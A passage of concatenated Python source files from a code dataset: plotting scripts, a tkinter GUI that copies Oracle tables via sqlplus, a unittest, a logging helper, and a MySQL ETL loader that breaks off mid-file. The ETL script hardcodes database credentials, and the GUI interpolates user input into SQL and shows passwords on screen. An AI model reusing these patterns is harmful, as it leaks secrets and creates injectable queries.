y_upper)\nbrazil_scatter.set_xlabel('UTM Horizontal Coordinate')\nbrazil_scatter.set_ylabel('UTM Vertical Coordinate')\n\n\nfig_brazil_histogram = plt.figure()\nbrazil_histogram = fig_brazil_histogram.add_subplot(111)\nbrazil_histogram.pcolor(x_mesh_plot, y_mesh_plot, histo, cmap='YlOrBr')\nbrazil_histogram.scatter(x_2013, y_2013, marker='.', color='black', s=0.3)\nhistogram_circle = plt.Circle((-50, -15), 11.3, fill=False, color='orange')\nbrazil_histogram.add_patch(histogram_circle)\nbrazil_histogram.set_title('Brazil 2013 Aedes Histogram')\n# brazil_histogram.set_xlim(x_lower, x_upper)\n# brazil_histogram.set_ylim(y_lower, y_upper)\nbrazil_histogram.set_xlabel('UTM Horizontal Coordinate')\nbrazil_histogram.set_ylabel('UTM Vertical Coordinate')\n\n\nplt.show()\n\n\"\"\"\n\n\n","sub_path":"Square_Rotation_Iterate.py","file_name":"Square_Rotation_Iterate.py","file_ext":"py","file_size_in_byte":37551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"450487505","text":"# MDR Copy\n# Copys eDocs between MDR environments based on user input data\n\nfrom tkinter import *\nfrom subprocess import Popen, PIPE\nfrom time import sleep\n\nconnectStringNoLog = '/nolog'\n\ndatArray = ['SASP_EXTRACT_CTRL','V_SASP_HDR','V_SASP_SEG','V_SASP_MPU','V_SASP_MCR','V_SASP_MPA',\n 'V_SASP_CPT','V_SASP_CSM','V_SASP_CQT','V_SASP_PQT','V_SASP_IMR','V_SASP_PDR','V_SASP_PBC',\n 'V_SASP_PAR','V_SASP_JOB_STATUS','V_POSTG_STMT_CSM_MAP','V_POSTG_STMT_CQT_MAP','V_POSTG_STMT_STATUS']\nxmlArray = ['SASP_EXTRACT_CTRL','V_MAILING_GROUP','V_QUAL_REPORT','V_QUAL_CONTAINER','V_QUAL_CTR_DETAIL','V_POSTG_STMT_HEADER',\n 'V_BNDL_DETAIL','V_PIECE_RANGE','V_MAIL_PIECE','V_POSTG_ADJUSTMENT','V_PS_CTR_INFO_MAP']\npwArray = ['PW_SASP_FIN_INTF_CTRL','SASP_POSTAGE_STATEMENT_VIEW','PW_FS_IMD_ASSESSMENT','PW_POS_DATA']\ndatCopalTrayArray = ['SASP_EXTRACT_CTRL_POST_FIN','V_SASP_HDR_TRAY','V_SASP_SEG_TRAY','V_SASP_MPU_TRAY','V_SASP_MCR_TRAY',\n 'V_SASP_MPA_TRAY','V_SASP_CPT_TRAY','V_SASP_CSM_TRAY','V_SASP_CQT_TRAY','V_SASP_PQT_TRAY','V_SASP_IMR_TRAY',\n 'V_SASP_PDR_TRAY','V_SASP_PBC_TRAY','V_SASP_OCI_TRAY','V_SASP_JOB_STATUS_TRAY','V_POSTG_STMT_CSM_MAP_TRAY',\n 'V_POSTG_STMT_STATUS_TRAY','V_SASP_CSM_POST_FIN']\ndatCopalBndlArray = ['SASP_EXTRACT_CTRL_POST_FIN','V_SASP_HDR_BNDL','V_SASP_SEG_ BNDL','V_SASP_MPU_ BNDL','V_SASP_MCR_ BNDL',\n 'V_SASP_MPA_ BNDL','V_SASP_CPT_ BNDL','V_SASP_CSM_ BNDL','V_SASP_CQT_ BNDL','V_SASP_PQT_ BNDL',\n 'V_SASP_IMR_ BNDL','V_SASP_PDR_ BNDL','V_SASP_PBC_BNDL','V_SASP_OCI_ BNDL','V_SASP_JOB_STATUS_BNDL',\n 'V_POSTG_STMT_CSM_MAP_BNDL','V_POSTG_STMT_STATUS_BNDL','V_SASP_CSM_POST_FIN']\nxmlCopalTrayArray = ['SASP_EXTRACT_CTRL_POST_FIN','V_MAILING_GROUP_TRAY','V_QUAL_REPORT_TRAY','V_QUAL_CONTAINER_TRAY',\n 'V_QUAL_CTR_DETL_TRAY','V_POSTG_STMT_HEADER_TRAY','V_BNDL_DETAIL_TRAY','V_PIECE_RANGE_TRAY',\n 'V_MAIL_PIECE_TRAY','V_ORIG_CTR_LINKAGE_TRAY','V_PS_CTR_INFO_MAP_TRAY','V_QUAL_CONTAINER_POST_FIN']\nxmlCopalBndlArray = ['SASP_EXTRACT_CTRL_POST_FIN','V_MAILING_GROUP_BNDL','V_QUAL_REPORT_BNDL','V_QUAL_CONTAINER_BNDL',\n 'V_QUAL_CTR_DETL_BNDL','V_POSTG_STMT_HEADER_BNDL','V_BNDL_DETAIL_BNDL','V_PIECE_RANGE_BNDL',\n 'V_MAIL_PIECE_BNDL','V_ORIG_CTR_LINKAGE_BNDL','V_PS_CTR_INFO_MAP_BNDL','V_QUAL_CONTAINER_POST_FIN']\n\n#Outputs views/tables to iterate over and condition for where clause based on the copy edoc type\ndef eDocView(eDocType):\n table = []; condition = ''\n if eDocType == \"Mail.dat\": table = datArray; condition = 'SASP_CTRL_SEQ_ID';\n elif eDocType == 
\"Mail.xml\": table = xmlArray; condition = 'SASP_CTRL_SEQ_ID';\n elif eDocType == \"PW/IMsb\": table = pwArray; condition = 'POSTG_STMT_SEQ_NBR';\n elif eDocType == \"Tray Copal (dat)\": table = datCopalTrayArray; condition = 'SASP_POST_FIN_EXTRACT_CTRL_SEQ_ID';\n elif eDocType == \"Bundle Copal (dat)\": table = datCopalBndlArray; condition = 'SASP_POST_FIN_EXTRACT_CTRL_SEQ_ID';\n elif eDocType == \"Tray Copal (xml)\": table = xmlCopalTrayArray; condition = 'SASP_POST_FIN_EXTRACT_CTRL_SEQ_ID';\n elif eDocType == \"Bundle Copal (xml)\": table = xmlCopalBndlArray; condition = 'SASP_POST_FIN_EXTRACT_CTRL_SEQ_ID';\n return table, condition\n \n#function that takes the sqlCommand and connectString and retuns the output and #error string (if any)\ndef runSqlQuery(sqlCommand, connectString):\n session = Popen(['sqlplus', '-S', connectString], stdin=PIPE, stdout=PIPE, stderr=PIPE)\n session.stdin.write(sqlCommand)\n return session.communicate()\n\ndef sqlSelects(table, owner):\n sqlCommands = []\n sqlCommandCol = bytes(\"SELECT column_name from all_tab_columns where owner = '%s' and table_name = '%s';\"%(owner,table),'UTF-8')\n sqlCommandType = bytes(\"SELECT data_type from all_tab_columns where owner = '%s' and table_name = '%s';\"%(owner,table),'UTF-8')\n sqlCommandLeng = bytes(\"SELECT coalesce(data_precision,data_length) DATA_LENG from all_tab_columns where owner = '%s' and table_name = '%s';\"\n %(owner,table),'UTF-8')\n sqlCommandNull = bytes(\"SELECT nullable NULL_IND from all_tab_columns where owner = '%s' and table_name = '%s';\"%(owner,table),'UTF-8')\n sqlCommands = [sqlCommandCol, sqlCommandType, sqlCommandLeng, sqlCommandNull]\n return sqlCommands\n \n#function to find all input instances within a string. Used for formatting.\ndef findAll(string, search):\n locList = [loc for loc in range(0,len(string)) if string.find(search, loc) == loc]\n return locList\n \n#Converts the sqlQueryConnect results into a usable list\ndef convertList(connectRes):\n tempArray = connectRes[:]\n newTblDesc = []\n #removing the string values (\\t = tab, \\r = return), find and create new lines \\n\n #to make string into a useable list\n tempArray = tempArray.replace('\\t ','')\n tempArray = tempArray.replace('\\t','')\n tempArray = tempArray.replace('\\r','')\n lineLoc = findAll(tempArray, '\\n')\n #loop through locations for new lines and append up to them as new lines within the array\n prev = 0\n for i in lineLoc: \n newTblDesc.append(tempArray[prev:i])\n prev = i+1\n return newTblDesc\n\n#Cleans description list to only provide column names and attributes.\ndef cleanQuery(descArray):\n finalDesc = []\n for line in descArray:\n if line[0] != 'COLUMN_NAME' and line[0] != '' and line[0][0] != '-':\n finalDesc.append(line)\n del finalDesc[-1]\n return finalDesc\n\ndef tableDescribe(sqlCommands, connectString):\n allQueryRes = []; finalDesc = []; \n #loop through each of the sqlCommands for description of the input table\n for inputQry in sqlCommands:\n visPrint = []\n queryResult = ''\n queryResult, errorMessage = runSqlQuery(inputQry, connectString)\n #decode from bytes to string\n decPrint = queryResult.decode(\"UTF-8\")\n visPrint = convertList(decPrint)\n visLeng = len(visPrint)\n #If nothing is in the list already then add as a new list.\n #This is so each line returned has the column name, type, length, and nullable\n #as an iterable list\n for a in range(0,visLeng):\n if len(allQueryRes) == visLeng: allQueryRes[a].append(visPrint[a])\n else: allQueryRes.append([visPrint[a]])\n #cleans up the list 
for usability\n finalDesc = cleanQuery(allQueryRes)\n return finalDesc\n\n#Corrects instances where source and target attributes mismatche (length, type, null). \ndef attributeValid(matchedColName, sourceDictVal, targDictVal):\n selectRecord = ''; selectStmt = ''\n selectRecord = matchedColName\n selectEnd = ' AS ' + matchedColName\n if sourceDictVal != targDictVal:\n sourceLeng = sourceDictVal[1]; sourceType = sourceDictVal[0]; sourceNull = sourceDictVal[2]\n targLeng = targDictVal[1]; targType = targDictVal[0]; targNull = targDictVal[2]\n convertTo = []\n lengCond = 0\n if sourceLeng > targLeng:\n selectRecord = 'SUBSTR('+matchedColName+',1,'+targLeng+')'\n lengCond = 1\n if sourceType != targType or lengCond == 1:\n if targType == 'DATE': convertTo = ['TO_DATE(',\",'YYYYMMDD')\"]\n elif targType == 'NUMBER': convertTo = ['TO_NUMBER(',')']\n elif targType == 'VARCHAR2': convertTo = ['TO_CHAR(',')']\n selectRecord = convertTo[0] + selectRecord + convertTo[1]\n if sourceNull != targNull:\n if targNull == 'Y': selectRecord = selectRecord\n else:\n if targType == 'DATE': convertTo = [\"TO_DATE('20130101','YYYYMMDD')\"]\n elif targType == 'NUMBER': convertTo = ['TO_NUMBER(1)']\n elif targType == 'VARCHAR2': convertTo = ['TO_CHAR(1)']\n selectRecord = ('CASE WHEN ' + matchedColName + ' IS NOT NULL THEN ' + selectRecord + ' ELSE ' + convertTo[0]\n + ' END')\n selectStmt = selectRecord + selectEnd\n return selectStmt\n\n#Handles target columns that dont exist in source environment.\ndef attNoMatch(noMatchColName, targDictVal):\n targLeng = targDictVal[1]; targType = targDictVal[0]; targNull = targDictVal[2]\n selectRecord = ''; convertTo = ''\n selectRecord = noMatchColName\n if targNull == 'Y': selectRecord = 'NULL AS ' + selectRecord\n else:\n if targType == 'DATE': convertTo = \"TO_DATE('20130101','YYYYMMDD') AS \"\n elif targType == 'NUMBER': convertTo = 'TO_NUMBER(1) AS '\n elif targType == 'VARCHAR2': convertTo = 'TO_CHAR(1) AS '\n selectRecord = convertTo + selectRecord\n return selectRecord\n\n#Compares source table description to the target. If there are more columns in the source,\n#they will not be selected. 
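Columns are matched by name, using dictionaries keyed on COLUMN_NAME. 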
If there are more columns in the target they will be selected as Null values\n#unless those fields are not nullable, in which case they will be defaulted to a random date or number.\n#The final output is an Array list to be used in the select query.\ndef columnCompare(sourceArrayFunc, targetArrayFunc):\n lenghtSource = len(sourceArrayFunc); lengthTarget = len(targetArrayFunc)\n selectArray = [];\n sourceColName = []; targColName = []\n sourceDict = {}; targDict = {}\n for sRowNum in range(0,lenghtSource):\n sourceColName.append(sourceArrayFunc[sRowNum][0])\n sourceDict[sourceArrayFunc[sRowNum][0]] = sourceArrayFunc[sRowNum][1:]\n for tRowNum in range(0,lengthTarget):\n targColName.append(targetArrayFunc[tRowNum][0])\n targDict[targetArrayFunc[tRowNum][0]] = targetArrayFunc[tRowNum][1:]\n colMatch = [tmpCol for tmpCol in targColName if tmpCol in sourceColName]\n colNoMatch = [tmpCol for tmpCol in targColName if tmpCol not in sourceColName]\n for matchedColName in colMatch:\n sourceDictVal = []; targDictVal = [];\n sourceDictVal = sourceDict[matchedColName]; targDictVal = targDict[matchedColName]\n selectRecord = attributeValid(matchedColName, sourceDictVal, targDictVal)\n selectArray.append(selectRecord)\n for noMatchColName in colNoMatch:\n targDictVal = []; targDictVal = targDict[noMatchColName]\n selectRecord = attNoMatch(noMatchColName, targDictVal)\n selectArray.append(selectRecord)\n return selectArray\n\n#Converts select list into a clean string\ndef stringSelect(selectList):\n #Put the select query together\n colSelStr = ''\n for v in range(0,len(selectList)):\n if v == (len(selectList)-1): colSelStr = colSelStr + selectList[v] + ''\n else: colSelStr = colSelStr + selectList[v] + ', '\n return colSelStr\n\n#Cleans and provides results from copy statement.\ndef results(noLogInfo):\n outputRes = ''\n decPrint = noLogInfo.decode(\"UTF-8\")\n visPrint = convertList(decPrint)\n for outputLine in visPrint[(len(visPrint)-3):]:\n outputRes = outputRes + outputLine\n return outputRes\n\nclass Application(Frame):\n \"\"\" GUI application that copys eDocs between MDR environments. \"\"\"\n def __init__(self, master):\n \"\"\" Initialize Frame. \"\"\"\n super(Application, self).__init__(master)\n self.grid()\n self.create_widgets()\n\n def create_widgets(self):\n \"\"\" Create widgets to get info for copy statements. \"\"\"\n # create instruction label\n Label(self,\n text = \"Enter eDoc information to copy\"\n ).grid(row = 0, column = 0, columnspan = 2, sticky = W)\n\n # create a label and text entry for the source schema identifier\n Label(self,\n text = \"Schema copying FROM \\n(i.e. 
MDRCENTRAL,SASP_R16_TST0): \"\n ).grid(row = 1, column = 0, sticky = W)\n self.source_owner_ent = Entry(self)\n self.source_owner_ent.grid(row = 1, column = 1, sticky = W)\n\n # create a label and text entry for the source username \n Label(self,\n text = \"Source username: \"\n ).grid(row = 2, column = 0, sticky = W)\n self.source_user_ent = Entry(self)\n self.source_user_ent.grid(row = 2, column = 1, sticky = W)\n\n # create a label and text entry for the source password \n Label(self,\n text = \"Source Password: \"\n ).grid(row = 3, column = 0, sticky = W)\n self.source_pwrd_ent = Entry(self)\n self.source_pwrd_ent.grid(row = 3, column = 1, sticky = W)\n\n # create a label and text entry for the source DB identifier \n Label(self,\n text = \"Source DB identifier: \"\n ).grid(row = 4, column = 0, sticky = W)\n self.source_db_ent = Entry(self)\n self.source_db_ent.grid(row = 4, column = 1, sticky = W)\n \n # create a label and text entry for the target schema identifier\n Label(self,\n text = (\"Schema copying TO \\n (i.e. MDRCENTRAL,SASP_R16_TST0): \")\n ).grid(row = 1, column = 2, sticky = W)\n self.target_owner_ent = Entry(self)\n self.target_owner_ent.grid(row = 1, column = 3, sticky = W)\n\n # create a label and text entry for the target username \n Label(self,\n text = \"Target username: \"\n ).grid(row = 2, column = 2, sticky = W)\n self.target_user_ent = Entry(self)\n self.target_user_ent.grid(row = 2, column = 3, sticky = W)\n\n # create a label and text entry for the target password \n Label(self,\n text = \"Target Password: \"\n ).grid(row = 3, column = 2, sticky = W)\n self.target_pwrd_ent = Entry(self)\n self.target_pwrd_ent.grid(row = 3, column = 3, sticky = W)\n\n # create a label and text entry for the target DB identifier \n Label(self,\n text = \"Target DB identifier: \"\n ).grid(row = 4, column = 2, sticky = W)\n self.target_db_ent = Entry(self)\n self.target_db_ent.grid(row = 4, column = 3, sticky = W)\n\n # create a label for eDoc Type radio buttons\n Label(self,\n text = \"eDoc Type:\"\n ).grid(row = 5, column = 0, sticky = W)\n\n # create variable for a single eDoc type\n self.edoc_type = StringVar()\n self.edoc_type.set(None)\n\n # create body part radio buttons\n edoc_type = [[\"Mail.dat\", \"Mail.xml\", \"PW/IMsb\"],\n [\"Tray Copal (dat)\", \"Bundle Copal (dat)\"],\n [\"Tray Copal (xml)\", \"Bundle Copal (xml)\"]]\n row = 5\n for rowList in edoc_type:\n column = 1\n for edoc in rowList:\n Radiobutton(self,\n text = edoc,\n variable = self.edoc_type,\n value = edoc\n ).grid(row = row, column = column, sticky = W)\n column += 1\n row += 1\n\n Label(self,\n text = \"Control Seq Id to Copy\\n (PW/IMSB - Seq NBR): \",\n anchor=\"w\",fg=\"black\",bg=\"yellow\").grid(row = 9, column = 0, sticky = W)\n self.seq_ent = Entry(self)\n self.seq_ent.grid(row = 9, column = 1, sticky = W)\n \n # create a submit button\n Button(self,\n text = \"Click to copy\",\n command = self.copy_data\n ).grid(row = 10, column = 0, sticky = W)\n\n self.story_txt = Text(self, width = 75, height = 10, wrap = WORD)\n self.story_txt.grid(row = 12, column = 0, columnspan = 4)\n\n def copy_data(self):\n \"\"\" Fill text box with copy information based on user input. 
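One COPY statement is built and run per table of the selected eDoc type. 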
\"\"\"\n # get values from the GUI\n #WEBADMIN#ADMINWEB#SIT, 3811725\n sourceOwner = self.source_owner_ent.get()\n sourceUserName = self.source_user_ent.get()\n sourcePwrd = self.source_pwrd_ent.get()\n sourceDB = self.source_db_ent.get()\n targetOwner = self.target_owner_ent.get()\n targetUserName = self.target_user_ent.get()\n targetPwrd = self.target_pwrd_ent.get()\n targetDB = self.target_db_ent.get()\n sourceConnectString = sourceUserName + '/' + sourcePwrd + '@' + sourceDB\n targetConnectString = targetUserName + '/' + targetPwrd + '@' + targetDB\n eDocType = self.edoc_type.get()\n record = self.seq_ent.get()\n outputMessage = []\n \n story = \"Copying data from \"\n story += sourceConnectString\n story += \" to \"\n story += targetConnectString + \". \"\n story += \"\\n\\n\"\n \n #use functions to do work\n selectTableList, condition = eDocView(eDocType)\n for tableName in selectTableList:\n SourceSqlCommands = sqlSelects(tableName, sourceOwner)\n targetSqlCommands = sqlSelects(tableName, targetOwner)\n sourceArrayFunc = tableDescribe(SourceSqlCommands, sourceConnectString)\n targetArrayFunc = tableDescribe(targetSqlCommands, targetConnectString)\n selectList = columnCompare(sourceArrayFunc, targetArrayFunc)\n colSelStr = stringSelect(selectList)\n query = ('Copy from ' + sourceConnectString + ' to ' + targetConnectString +\n ' insert ' + targetOwner + '.' + tableName + ' using select ' + colSelStr +\n ' from ' + sourceOwner + '.' + tableName + ' where ' + condition + ' = ' + str(record)\n + ' and rownum<400000;')\n copySqlCommand = bytes('Set arraysize 5000 \\n Set copycommit 4 \\n %s' %query,'UTF-8')\n noLogResult, noLogError = runSqlQuery(copySqlCommand, connectStringNoLog)\n resultMessage = results(noLogResult)\n outputMessage.append([tableName, resultMessage])\n \n # create the story\n sleep(10)\n for tableResults in outputMessage:\n story += str(tableResults)\n story += \"\\n\"\n story += \"\\n\"\n \n # display the story\n self.story_txt.delete(0.0, END)\n self.story_txt.insert(0.0, story)\n\n# main\nroot = Tk()\nroot.title(\"MDR Copy\")\napp = Application(root)\nroot.mainloop()\n","sub_path":"Python/sqlCopy/archive/sqlPythonCopyGUI.py","file_name":"sqlPythonCopyGUI.py","file_ext":"py","file_size_in_byte":18147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"185616652","text":"#!/usr/bin/python3\n\"\"\"\n Unittester for the AirBnB project\n\"\"\"\nimport unittest\nimport pep8\nfrom models.base_model import BaseModel\n\n\nclass Test_base_model(unittest.TestCase):\n \"\"\" Tester that checks whetever everything is working as intended \"\"\"\n\n def test_pep8_pycodestyle(self):\n \"\"\" Tester for pep8/pycodestyle \"\"\"\n pep8style = pep8.StyleGuide(quiet=True)\n result = pep8style.check_files(['models/base_model.py'])\n self.assertEqual(result.total_errors, 0,\n \"Found code style errors, please fix them\")\n\n def test_instanceof_itself(self):\n \"\"\" Tester to see if he is an instance of BaseModel \"\"\"\n my_model = BaseModel()\n my_model.name = \"Holberton\"\n my_model.my_number = 89\n self.assertTrue(isinstance(my_model, BaseModel))\n\n def test_checkif_docstring(self):\n \"\"\" Tester to see if the function is correctly documented \"\"\"\n self.assertIsNotNone(BaseModel.__doc__)\n self.assertIsNotNone(BaseModel.__init__.__doc__)\n self.assertIsNotNone(BaseModel.__str__.__doc__)\n self.assertIsNotNone(BaseModel.to_dict.__doc__)\n 
self.assertIsNotNone(BaseModel.save.__doc__)\n","sub_path":"tests/test_models/test_base_model.py","file_name":"test_base_model.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"165763081","text":"\"\"\"\r\napp.com_data.write_exception_into_log\r\n---------------------------------------------------------------\r\nStandalone module for writing exception messages to the *.log journal\r\n\"\"\"\r\n\r\n\r\n\"\"\"\r\narg_mes: string, the place in the code where the exception occurred\r\narg_except: the exception message itself\r\n\"\"\"\r\ndef PM_write_except_into_log(arg_mes, arg_except):\r\n    \"\"\" Module-level procedure for app.com_serv_dbase.serv_modf_profil\r\n    Writes the exception text to the *.log journal \r\n    ----------------------------------------------------------------\r\n    arg_mes base string used to build the *.log journal entry\r\n    arg_except message detail string \"\"\"\r\n\r\n    from app import TypeError_system, ErrorRun_impl\r\n\r\n    \"\"\" the message type and level are encoded in arg_mes: verify, ValueError, SyntaxError, ...\r\n    for example: SyntaxError##exception message text \"\"\"\r\n    s_mes = '{0} {1}'.format(arg_mes, arg_except)\r\n    TypeError_system(ErrorRun_impl(s_mes)) # write the entry to the app/loggin/*.log file\r\n\r\n\r\n\r\ndef PM_run_raise(s_arg, showMes=None):\r\n    \"\"\" Exception handler used within the code structure \r\n    s_arg the exception message\r\n    showMes=True -> the message is intended for the browser\r\n    showMes=False -> the ErrorRun_impl data is written to the journal \r\n    via the assignment chain res_proc.error=ErrorRun_impl -> TypeError_system(value),\r\n    so s_arg must be built to match the format of messages placed in *.log\r\n    \"\"\"\r\n\r\n    from app import ErrorRun_impl\r\n\r\n    s_err = 'embedded template'\r\n\r\n    if showMes:\r\n        raise ErrorRun_impl('verify##{0}'.format(s_arg))\r\n    else:\r\n        raise ErrorRun_impl('{0} {1}'.format(s_err, s_arg))","sub_path":"app/com_data/write_exception_into_log.py","file_name":"write_exception_into_log.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"175323250","text":"'''\n======================\n3D surface (color map)\n======================\n\nDemonstrates plotting a 3D surface colored with the coolwarm color map.\nThe surface is made opaque by using antialiased=False.\n\nAlso demonstrates using the LinearLocator and custom formatting for the\nz axis tick labels.\n'''\n\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\nimport matplotlib.mlab as mlab\nimport numpy as np\n\npaths = np.loadtxt(\"path.txt\", dtype=str)\nloadPath = paths[0]\nsavePath = paths[1]\n\nextensionTypes = [\".pdf\",\".png\"]\n\ndim = (np.size(np.loadtxt(loadPath + \"band0.txt\", delimiter=\",\")[0])-3)//2\nspaceLabel = [\"\"]\n\nspinLabel = [\"spinUp\",\"spinDown\"]\n\nBrlldata = np.array([np.transpose(np.loadtxt(loadPath + \"band\"+ str(bandNum)+\".txt\", delimiter=\",\")) for bandNum in range(dim)])\n\n#################################################################################################################################################################################################\n\nfigDensity = plt.figure(\"Density Plot\", figsize=plt.figaspect(1))\nplt.subplots_adjust(hspace = 0, wspace = 0,left=0.02,bottom=0.02,top=.98,right=.98)\nrowI=0\nfor spaceI 
in range(len(spaceLabel)):\n for spinI in range(len(spinLabel)):\n stateI = len(spinLabel)*spaceI+spinI\n for band in range(dim):\n axDensity = figDensity.add_subplot(dim,dim,stateI*dim+band+1)\n axDensity.set_xticks([])\n axDensity.set_yticks([])\n densityPlot = axDensity.tricontourf(Brlldata[band][0],Brlldata[band][1],Brlldata[band][(stateI%2)*len(spaceLabel)+spaceI+3], norm=plt.Normalize(vmax=1, vmin=0))\n rowI+=1\nfor ext in extensionTypes:\n figDensity\n plt.savefig(savePath+\"state/allDensity\"+ext)\n#################################################################################################################################################################################################\n\nfigPhase = plt.figure(\"Phase Plot\", figsize=plt.figaspect(1))\nplt.subplots_adjust(hspace = 0, wspace = 0,left=0.02,bottom=0.02,top=.98,right=.98)\nrowI=0\nfor spaceI in range(len(spaceLabel)):\n for spinI in range(len(spinLabel)):\n stateI = len(spinLabel)*spaceI+spinI\n for band in range(dim):\n axPhase = figPhase.add_subplot(dim,dim,stateI*dim +band+1)\n axPhase.set_xticks([])\n axPhase.set_yticks([])\n phasePlot = axPhase.tricontourf(Brlldata[band][0],Brlldata[band][1],Brlldata[band][(stateI%2)*len(spaceLabel)+spaceI+3+dim], norm=plt.Normalize(vmax=np.pi, vmin=-np.pi))\n rowI+=1\nfor ext in extensionTypes:\n figPhase\n plt.savefig(savePath+\"state/allPhase\"+ext)\n#################################################################################################################################################################################################\n#Saving\n\n\n#################################################################################################################################################################################################\n\nplt.show()\n","sub_path":"kSpace/normal/Plot/colorMaps/statePlotBlock.py","file_name":"statePlotBlock.py","file_ext":"py","file_size_in_byte":3167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"218621419","text":"import mysql.connector\nimport requests \nimport json\n\nmydb = mysql.connector.connect(\n host=\"35.240.248.249\",\n user=\"kumparanGuest\",\n passwd=\"guestForKumparan\"\n)\nmycursor = mydb.cursor()\nmycursor.execute(\"CREATE DATABASE IF NOT EXISTS 20190225_Kurniawan_Kesuma_Putra\")\nmycursor.close()\n\nmydb = mysql.connector.connect(\n host=\"35.240.248.249\",\n user=\"kumparanGuest\",\n passwd=\"guestForKumparan\",\n database = \"20190225_Kurniawan_Kesuma_Putra\"\n)\n\ncreate_table_list = [\n\"\"\"CREATE TABLE IF NOT EXISTS stories \n (\n story_id varchar(255) primary key, \n created_date text, \n updated_date text,\n published_date text,\n datatype varchar(255), \n author_group varchar(255),\n author_id varchar(255),\n editor_id varchar(255),\n is_adult_content tinyint(1),\n lead_text text,\n location_latitude int,\n location_longitude int,\n location_name varchar(255),\n slug text,\n status varchar(255),\n title text,\n type varchar(255),\n meta_description text\n )\"\"\",\n\"\"\"CREATE TABLE IF NOT EXISTS story_editor \n (\n story_id varchar(255),\n editor_id varchar(255)\n )\"\"\",\n\"\"\"CREATE TABLE IF NOT EXISTS polling_choices \n ( \n story_id VARCHAR(255), \n choices_index INT,\n image VARCHAR(255),\n selected TINYINT(1),\n stats INT,\n text TEXT\n )\"\"\",\n\"\"\"CREATE TABLE IF NOT EXISTS story_polling \n ( \n story_id VARCHAR(255), \n date_start text,\n date_end text,\n question_text TEXT,\n question_cover VARCHAR(255),\n hide_results TINYINT(1),\n 
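-- populated from polling.settings.hideResult in the source JSON\n        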
is_multiple TINYINT(1),\n other_manual TINYINT(1)\n )\"\"\",\n\"\"\"CREATE TABLE IF NOT EXISTS story_lead_media \n ( \n story_id VARCHAR(255), \n lead_media_type VARCHAR(155),\n lead_media_url TEXT\n )\"\"\",\n\"\"\"CREATE TABLE IF NOT EXISTS story_topic \n ( \n story_id VARCHAR(255), \n topic_id VARCHAR(255),\n row_num INT auto_increment,\n unique(row_num)\n )\"\"\" \n]\n\n#create table in mysql server\nfor item in create_table_list:\n mycursor = mydb.cursor()\n mycursor.execute(item)\n mycursor.close()\n\n#get file in url\nr = requests.get(\"https://storage.googleapis.com/kumparan-public-bucket/bi_engineer_test/BI_Engineer.json\")\njson_obj = json.loads(r.text)\n\n#insert value into stories\nqrys = []\n\nfor item in json_obj:\n story_id = item['_key']\n created_date = item['date']['create']\n updated_date = item['date']['update']\n published_date = item['date']['publish']\n datatype = item['datatype']\n author_group = item['author']['group']\n author_id = item['author']['id']\n if item['editor']:\n editor_id = item['editor']['id']\n else:\n editor_id = None\n if 'adultContent' in item[\"is\"]:\n is_adult_content = item['is']['adultContent']\n else:\n is_adult_content = None\n lead_text = item['lead_text']['content']\n if item['location']:\n location_latitude = item['location']['lat']\n location_longitude = item['location']['lng']\n location_name = item['location']['name']\n else:\n location_latitude = None\n location_longitude = None\n location_name = None\n slug = item['slug']\n status = item['status']\n title = item['title']\n type = item['type']\n if item['meta']:\n meta_description = item['meta']['description']\n else:\n meta_description = None\n qry = (story_id, created_date, updated_date, published_date, datatype, author_group, author_id, editor_id, is_adult_content, lead_text, location_latitude, location_longitude, location_name, slug, status, title, type, meta_description)\n qrys.append(qry)\n\ncurr = mydb.cursor()\ncurr.execute(\"TRUNCATE stories\")\ncurr.close()\n\ncursor = mydb.cursor()\nstmt = \"INSERT INTO stories (story_id, created_date, updated_date, published_date, datatype, author_group, author_id, editor_id, is_adult_content, lead_text, location_latitude, location_longitude, location_name, slug, status, title, type, meta_description) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\ncursor.executemany(stmt, qrys)\nmydb.commit()\ncursor.close()\n\n#insert value into story_editor\nqrys = []\n\nfor item in json_obj:\n if 'editors' in item:\n story_id = item['_key']\n if item['editors']: #insert only story_id that have editor_id\n for x in item['editors']:\n story_editor = x\n qry = (story_id, story_editor)\n qrys.append(qry)\n\ncurr = mydb.cursor()\ncurr.execute(\"TRUNCATE story_editor\")\ncurr.close()\n\ncursor = mydb.cursor()\nstmt = \"INSERT INTO story_editor (story_id, editor_id) VALUES (%s, %s)\"\ncursor.executemany(stmt, qrys)\nmydb.commit()\ncurr.close()\n\n#insert into story_topic\nqrys = []\n\nfor item in json_obj:\n story_id = item['_key']\n if 'topics' in item['labels']:\n if len(item['labels']['topics'])==1:\n topics_id = item['labels']['topics'][0]\n else:\n topics_id = ','.join(item['labels']['topics'])\n else:\n topics_id = None\n qry = (story_id, topics_id)\n qrys.append(qry)\n\ncurr = mydb.cursor()\ncurr.execute(\"TRUNCATE story_topic\")\ncurr.close()\n\ncursor = mydb.cursor()\nstmt = \"INSERT INTO story_topic (story_id, topic_id) VALUES (%s, %s)\"\ncursor.executemany(stmt, qrys)\nmydb.commit()\ncursor.close()\n\n#insert 
